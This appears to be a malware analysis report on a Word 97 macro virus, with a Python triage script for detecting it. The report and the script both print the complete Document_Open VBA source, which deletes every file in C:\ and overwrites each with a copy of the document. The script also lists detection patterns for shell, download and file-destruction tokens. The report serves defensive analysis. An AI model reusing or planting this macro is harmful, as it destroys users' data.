Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8885dc04054f5943…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 2002-02-14 19:42:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: e46a393c6f2c4c51ee836dc1cbdb0645
SHA-1: 004a680a48b9e52acd1378eaf997fd6f24d3dc19
SHA-256: 8885dc04054f5943d639fce475fc32b7f714b3aa464e196342378067495d0386
Risk score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA module with a Document_Open procedure, so the code runs automatically when the document is opened (subject to the host's macro security settings). The macro does not call Shell. Its only execution-type construct is a Declare statement importing the Win32 API CopyFileA from kernel32. It then uses the legacy Application.FileSearch object to enumerate every file in the root of C:\ (subfolders excluded) and, for each file that is not the open document itself, deletes it with Kill and copies the document over the freed name with CopyFileA. The document is therefore neither moved nor deleted: it overwrites the other files in C:\ with copies of itself, destroying their contents, which is classic Word 97-era macro-virus behaviour. On Error Resume Next suppresses every failure (locked or protected files), so the loop continues past anything it cannot delete. Application.FileSearch was removed in Office 2007, so on a modern Word the enumeration step fails; the payload was written for the Word 97/2000-era hosts matching the file's authoring application, and should be treated as a working destructive payload there.

Heuristics 4

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Trojan.Quiet-11
  • OLE_VBA_MACROS (medium, 2 related findings): document contains VBA macro code
  • OLE_VBA_DOCOPEN (high): a Document_Open macro is present, so the code runs automatically when the document is opened
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): the compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule fires on the compiled stream rather than on decompressed source, so it still catches p-code-only macro documents and documents where source extraction fails and no visible source is available.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 721 bytes
SHA-256: 8b423532ac136763b0c3c36d860c1a4ba1c697d63bb22fc57bb454fd9d3ece02
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Sub Document_Open()
On Error Resume Next
Set FS = Application.FileSearch
FS.NewSearch
FS.FileName = "*.*"
FS.LookIn = "C:\"
FS.SearchSubFolders = False
FS.Execute
For i = 1 To FS.FoundFiles.Count
If FS.FoundFiles(i) <> ActiveDocument.FullName Then
Kill FS.FoundFiles(i)
CopyFileA ActiveDocument.FullName, FS.FoundFiles(i), 0
End If
Next i
End Sub
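The triage logic behind the Heuristics section, applied at source level, as an added example that is not part of this report or of the tooling that produced it. It takes the Document_Open module shown above (re-embedded as a constructed string without the Attribute lines, so the report's 721-byte SHA-256 does not apply to it) plus a constructed benign control, looks for auto-execution entry points and execution-type tokens, and flags self-replication (the open document used as the source of a file copy). The finding IDs VBA_AUTOEXEC_EXEC and VBA_SELF_REPLICATION, the token categories and the verdict scale are this example's own assumptions; OLE_VBA_MACROS and OLE_VBA_DOCOPEN reuse the report's labels. Run on the sample it confirms the point made above: there is no Shell call, and the execution-type token is the kernel32 Declare of CopyFileA.

```python
import re

# Constructed copy of the Document_Open module from the extracted artifact above
# (Attribute lines omitted; the SHA-256 in the report refers to the original file).
SAMPLE_VBA = r'''Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Sub Document_Open()
On Error Resume Next
Set FS = Application.FileSearch
FS.NewSearch
FS.FileName = "*.*"
FS.LookIn = "C:\"
FS.SearchSubFolders = False
FS.Execute
For i = 1 To FS.FoundFiles.Count
If FS.FoundFiles(i) <> ActiveDocument.FullName Then
Kill FS.FoundFiles(i)
CopyFileA ActiveDocument.FullName, FS.FoundFiles(i), 0
End If
Next i
End Sub
'''

# Constructed control: an auto-exec handler whose only effect is inside the document.
BENIGN_VBA = r'''Sub Document_Open()
' constructed example: event handler with no host-side effects
ActiveDocument.Range(0, 0).InsertBefore "Opened on " & Format(Now, "yyyy-mm-dd")
End Sub
'''

# Procedures Office runs without user interaction (Word and Excel names).
AUTOEXEC = ("Document_Open", "AutoOpen", "AutoExec", "Document_Close", "AutoClose",
            "Workbook_Open", "Auto_Open", "Workbook_Activate")

# Tokens that, next to an auto-exec entry point, mean the macro acts on the host
# rather than on the document (categories are this example's own assumption).
EXEC_TOKENS = {
    "shell":      re.compile(r"\bShell\b|\bWScript\.Shell\b", re.I),
    "object":     re.compile(r"\bCreateObject\b|\bGetObject\b", re.I),
    "download":   re.compile(r"\bURLDownloadToFile\w*\b|\bXMLHTTP\b", re.I),
    # Captures the library name of a Win32 API import, e.g. kernel32.
    "win32_api":  re.compile(r'\bDeclare\b[^\n]*?\bLib\s+"([^"]+)"', re.I),
    "file_write": re.compile(r"\bKill\b|\bCopyFile\w*\b|\bFileCopy\b|"
                             r"\bOpen\b[^\n]+\bFor\s+(?:Output|Binary)\b", re.I),
}


def _strip_comments(src):
    # Drop whole-line VBA comments; trailing comments after code would need a
    # string-literal-aware tokenizer, which this triage deliberately does not do.
    return "\n".join(line for line in src.splitlines()
                     if not line.strip().lower().startswith(("'", "rem ")))


def triage_vba(src):
    """Return the findings a source-level static triage raises for one VBA module."""
    code = _strip_comments(src)
    autoexec = [name for name in AUTOEXEC
                if re.search(r"\b(?:Sub|Function)\s+%s\b" % name, code, re.I)]
    tokens = {}
    for kind, rx in EXEC_TOKENS.items():
        hits = sorted({m.group(1) if kind == "win32_api" else m.group(0)
                       for m in rx.finditer(code)})
        if hits:
            tokens[kind] = hits
    # The open document used as the source of a file copy is replication, whatever
    # the destination (here: every file in C:\ after Kill has removed it).
    self_replicating = bool(re.search(r"\bCopyFile\w*\s+ActiveDocument\.FullName\b",
                                      code, re.I))
    findings = [("OLE_VBA_MACROS", "medium")]
    if "Document_Open" in autoexec:
        findings.append(("OLE_VBA_DOCOPEN", "high"))
    if autoexec and tokens:
        findings.append(("VBA_AUTOEXEC_EXEC", "high"))      # assumed ID
    if self_replicating:
        findings.append(("VBA_SELF_REPLICATION", "critical"))  # assumed ID
    if autoexec and tokens:
        verdict = "malicious"
    elif autoexec or tokens:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"autoexec": autoexec, "tokens": tokens,
            "self_replicating": self_replicating,
            "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("control", BENIGN_VBA)):
        r = triage_vba(src)
        print(label, r["verdict"], r["findings"], r["tokens"])
```

The control module shows why the auto-exec trigger alone is only "suspicious": Document_Open is common in legitimate templates, and it is the combination with host-side tokens (API imports, Kill, process execution) that justifies the report's high-severity finding.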